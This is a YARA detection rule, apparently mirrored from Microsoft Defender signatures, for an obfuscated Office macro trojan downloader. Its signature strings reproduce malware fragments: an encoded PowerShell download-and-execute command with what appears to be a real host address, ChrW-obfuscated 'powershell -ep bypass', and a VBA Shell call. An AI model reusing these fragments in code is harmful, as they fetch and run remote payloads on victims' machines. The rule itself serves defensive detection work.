qwqdanchun
/
DefenderYara
mirror of https://github.com/qwqdanchun/DefenderYara.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
DefenderYara/TrojanDownloader/O97M/Obfuse/TrojanDownloader_O97M_Obfus...

16 lines
2.9 KiB
Plaintext
Raw Permalink Blame History

rule TrojanDownloader_O97M_Obfuse_PJ_MTB{
meta:
description = "TrojanDownloader:O97M/Obfuse.PJ!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,06 00 06 00 06 00 00 "
strings :
$a_00_0 = {53 51 42 46 41 46 67 41 49 41 41 6f 41 43 67 41 62 67 42 6c 41 48 63 41 4c 51 42 76 41 47 49 41 61 67 42 6c 41 47 4d 41 64 41 41 67 41 47 34 41 5a 51 42 30 41 43 34 41 64 77 42 6c 41 47 49 41 59 77 42 73 41 47 6b 41 5a 51 42 75 41 48 51 41 4b 51 41 75 41 47 51 41 62 77 42 33 41 47 34 41 62 41 42 76 41 47 45 41 5a 41 42 7a 41 48 51 41 63 67 42 70 41 47 34 41 5a 77 41 6f 41 43 63 41 61 41 42 30 41 48 51 41 63 } //1 SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAc
$a_00_1 = {41 41 36 41 43 38 41 4c 77 41 32 41 44 6b 41 4c 67 41 30 41 44 55 41 4c 67 41 78 41 44 6b 41 4c 67 41 79 41 44 55 41 4e 41 41 36 41 44 67 41 4d 41 41 34 41 44 41 41 4c 77 42 4f 41 48 49 41 62 67 41 7a 41 45 63 41 52 41 42 71 41 44 67 41 4f 51 42 30 41 44 55 41 4c 77 42 53 41 48 55 41 62 67 42 4e 41 47 55 41 5a 41 42 70 41 47 45 41 4c 67 42 30 41 48 67 41 64 41 41 6e 41 43 6b 41 4b 51 41 67 41 41 3d 3d } //1 AA6AC8ALwA2ADkALgA0ADUALgAxADkALgAyADUANAA6ADgAMAA4ADAALwBOAHIAbgAzAEcARABqADgAOQB0ADUALwBSAHUAbgBNAGUAZABpAGEALgB0AHgAdAAnACkAKQAgAA==
$a_00_2 = {43 68 72 57 28 31 31 32 29 20 26 20 43 68 72 57 28 31 31 31 29 20 26 20 43 68 72 57 28 31 31 39 29 20 26 20 43 68 72 57 28 31 30 31 29 20 26 20 43 68 72 57 28 31 31 34 29 20 26 20 43 68 72 57 28 31 31 35 29 20 26 20 43 68 72 57 28 31 30 34 29 20 26 20 43 68 72 57 28 31 30 31 29 20 26 20 43 68 72 57 28 31 30 38 29 20 26 20 43 68 72 57 28 31 30 38 29 20 26 20 43 68 72 57 28 34 36 29 20 26 20 43 68 72 57 28 31 30 31 29 20 26 20 43 68 72 57 28 31 32 30 29 20 26 20 43 68 72 57 28 31 30 31 29 } //1 ChrW(112) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(115) & ChrW(104) & ChrW(101) & ChrW(108) & ChrW(108) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
$a_00_3 = {26 20 43 68 72 57 28 33 32 29 20 26 20 43 68 72 57 28 34 35 29 20 26 20 43 68 72 57 28 31 30 31 29 20 26 20 43 68 72 57 28 31 31 32 29 20 26 20 43 68 72 57 28 33 32 29 20 26 20 43 68 72 57 28 39 38 29 20 26 20 43 68 72 57 28 31 32 31 29 20 26 20 43 68 72 57 28 31 31 32 29 20 26 20 43 68 72 57 28 39 37 29 20 26 20 43 68 72 57 28 31 31 35 29 20 26 20 43 68 72 57 28 31 31 35 29 20 26 20 43 68 72 57 28 33 32 29 20 26 20 43 68 72 57 28 34 35 29 20 26 20 43 68 72 57 28 31 30 31 29 20 26 20 43 68 72 57 28 33 32 29 } //1 & ChrW(32) & ChrW(45) & ChrW(101) & ChrW(112) & ChrW(32) & ChrW(98) & ChrW(121) & ChrW(112) & ChrW(97) & ChrW(115) & ChrW(115) & ChrW(32) & ChrW(45) & ChrW(101) & ChrW(32)
$a_00_4 = {56 42 41 2e 53 68 65 6c 6c 20 28 } //1 VBA.Shell (
$a_00_5 = {56 42 41 2e 45 6e 76 69 72 6f 6e 24 28 22 43 4f 4d 53 50 45 43 22 29 } //1 VBA.Environ$("COMSPEC")
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1) >=6
}
Reference in New Issue View Git Blame Copy Permalink